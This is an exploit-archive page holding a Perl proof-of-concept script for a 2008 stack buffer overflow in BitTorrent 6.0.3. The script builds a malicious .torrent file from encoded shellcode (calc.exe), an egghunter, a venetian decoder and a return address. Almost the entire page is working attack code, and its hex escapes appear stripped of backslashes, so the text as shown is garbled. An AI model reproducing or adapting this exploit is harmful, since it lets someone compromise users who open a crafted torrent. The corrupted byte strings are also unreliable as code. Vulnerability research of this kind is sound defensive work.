[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# Published : 2008-10-19
# Author : Guido Landi
# Previous Title : VLC Media Player TY File Stack Based Buffer Overflow Exploit
# Next Title : MS Windows XP/2003 AFD.sys Privilege Escalation Exploit (K-plugin)
#!/usr/bin/perl
# BitTorrent 6.0.3 .torrent File Stack Buffer Overflow Exploit
# 09/21/2008 by k`sOSe && oVeret
use warnings;
use strict;
# If you change this(avoid x80->x9f unless you really know what you are doing) you must also change the length value of the decoder
my $shellcode =
# windows/exec CMD="C:WINDOWSsystem32calc.exe"
#[*] x86/alpha_mixed succeeded, final size 337
"x49x49x49x49x49x49x49x49x49x49x49x49x49x49" .
"x49x49x49x37x51x5ax6ax41x58x50x30x41x30x41" .
"x6bx41x41x51x32x41x42x32x42x42x30x42x42x41" .
"x42x58x50x38x41x42x75x4ax49x4bx4cx4bx58x51" .
"x54x43x30x45x50x45x50x4cx4bx51x55x47x4cx4c" .
"x4bx43x4cx45x55x44x38x43x31x4ax4fx4cx4bx50" .
"x4fx42x38x4cx4bx51x4fx47x50x43x31x4ax4bx51" .
"x59x4cx4bx50x34x4cx4bx43x31x4ax4ex46x51x49" .
"x50x4ax39x4ex4cx4bx34x49x50x42x54x43x37x49" .
"x51x48x4ax44x4dx45x51x48x42x4ax4bx4cx34x47" .
"x4bx50x54x47x54x43x34x43x45x4dx35x4cx4bx51" .
"x4fx51x34x45x51x4ax4bx42x46x4cx4bx44x4cx50" .
"x4bx4cx4bx51x4fx45x4cx43x31x4ax4bx4cx4bx45" .
"x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx46x44x45" .
"x54x48x43x51x4fx46x51x4bx46x45x30x46x36x45" .
"x34x4cx4bx47x36x50x30x4cx4bx51x50x44x4cx4c" .
"x4bx44x30x45x4cx4ex4dx4cx4bx45x38x45x58x4d" .
"x59x4bx48x4dx53x49x50x42x4ax50x50x45x38x4a" .
"x50x4cx4ax43x34x51x4fx45x38x4cx58x4bx4ex4c" .
"x4ax44x4ex50x57x4bx4fx4ax47x50x43x46x5ax51" .
"x4cx46x37x50x49x50x4ex51x54x50x4fx50x57x50" .
"x53x51x4cx42x53x43x49x44x33x44x34x45x35x42" .
"x4dx50x33x46x52x51x4cx42x43x43x51x42x4cx45" .
"x33x46x4ex43x55x42x58x42x45x43x30x44x4ax41" .
"x41";
$shellcode .= "x87x87"; # -> x21x20x21x20 -> EGG ( for english windows version )
my $ret = "x3fx41"; # -> unicode friendly pop,pop,ret
# unicode friendly get_EIP (needed by the venetian decoder)
sub get_eip
{
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5F POP EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#6A 00 PUSH 0
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
#57 PUSH EDI
#0041 00 ADD BYTE PTR DS:[ECX],AL
#54 PUSH ESP
#0041 00 ADD BYTE PTR DS:[ECX],AL
#5A POP EDX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#40 INC EAX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#43 INC EBX
#0042 00 ADD BYTE PTR DS:[EDX],AL
#58 POP EAX
#0041 00 ADD BYTE PTR DS:[ECX],AL
"x5fx41x5fx41x6ax58x41x57x41x54x41x5a" . "x42x40" x 12 . "x42x43" . "x42x58x41";
}
sub egghunter
{
#6A01 PUSH 1
#5E POP ESI
#4E DEC ESI (=0)
#6A72 PUSH 72 <- starts from 0x00720000
#56 PUSH ESI
#4C DEC ESP
#4C DEC ESP
#5E POP ESI
#5E POP ESI <- ESI == 0x00720000
#BA21202120 /MOV EDX,20212021 <- egg
#46 |INC ESI
#3B16 |CMP EDX,DWORD PTR DS:[ESI]
#75FB JNZ SHORT egghunter
"x6Ax01x5Ex4Ex6Ax72x56x4Cx4Cx5Ex5ExBAx21x20x21x20x46x3Bx16x75xFB";
}
# this will decode the unicode expanded shellcode pushing it to the stack and the execute it
sub decoder
{
#46 INC ESI
#6A01 PUSH 1
#6801010155 PUSH 0x55010101
#4C DEC ESP
#5B POP EBX
#5B POP EBX
#AD /LODS DWORD PTR DS:[ESI]
#50 |PUSH EAX
#44 |INC ESP
#44 |INC ESP
#44 |INC ESP
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4E |DEC ESI
#4B |DEC EBX
#83FB01 |CMP EBX,1
#75EF JNE SHORT decoder
#54 PUSH ESP
#59 POP ECX
#4C DEC ESP -> realign
#51 PUSH ECX
#C3 RET
"x46x6Ax01x68x01x01x01x55x4Cx5Bx5BxADx50x44x44x44x4Ex4Ex4Ex4Ex4Ex4Ex4Bx83xFBx01x75xEFx54x59x4cx51xc3";
}
# venetian deccoder + venetian encoded egghunter and decoder
sub venetian_decoder
{
"x05x03x01x71x2Dx01x01x71x40x71xC6x01x71x40x71x40".
"x71xC6x4Ex71x40x71x40x71xC6x72x71x40x71x40x71xC6".
"x4Cx71x40x71x40x71xC6x5Ex71x40x71x40x71xC6xBAx71".
"x40x71x40x71xC6x20x71x40x71x40x71xC6x20x71x40x71".
"x40x71xC6x3Bx71x40x71x40x71xC6x75x71x40x71x40x71".
"xC6x46x71x40x71x40x71xC6x01x71x40x71x40x71xC6x01".
"x71x40x71x40x71xC6x01x71x40x71x40x71xC6x4Cx71x40".
"x71x40x71xC6x5Bx71x40x71x40x71xC6x50x71x40x71x40".
"x71xC6x44x71x40x71x40x71xC6x4Ex71x40x71x40x71xC6".
"x4Ex71x40x71x40x71xC6x4Ex71x40x71x40x71xC6x4Bx71".
"x40x71xFExFEx40x71xC6xFBx71x40x71x40x71xC6x75x71".
"x40x71x40x71xC6x54x71x40x71x40x71xC6x4Cx71x40x71".
"x40x71xC6xC3x71x40x71x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04x04".
"x6Ax5Ex6Ax56x4Cx5Ex21x21x46x16xFBx6Ax68x01x55x5B".
"xADx44x44x4Ex4Ex4Ex81x01xEFx59x51";
}
my $stack_buffer = $ret x 192 . get_eip() . venetian_decoder();
open(HANDLE, "> torrent.torrent") || die "Error!nn";
print HANDLE "d8:announce17:http://qwerty.qwe7:comment" .
length($shellcode) .":" .
$shellcode .
"10:created by" .
length($stack_buffer) . ":" .
$stack_buffer .
"13:creation datei1218555046e8:encoding10:iso-8859-14:infod6:lengthi1e4:name6:bu.txt12:piece lengthi65536e6:pieces20:".
"x86xf7xe4x37xfaxa5xa7xfcxe1x5dx1dxdcxb9xeaxeaxeax37x76x67xb8x65x65x0a";
close (HANDLE);
# www.Syue.com [2008-10-19]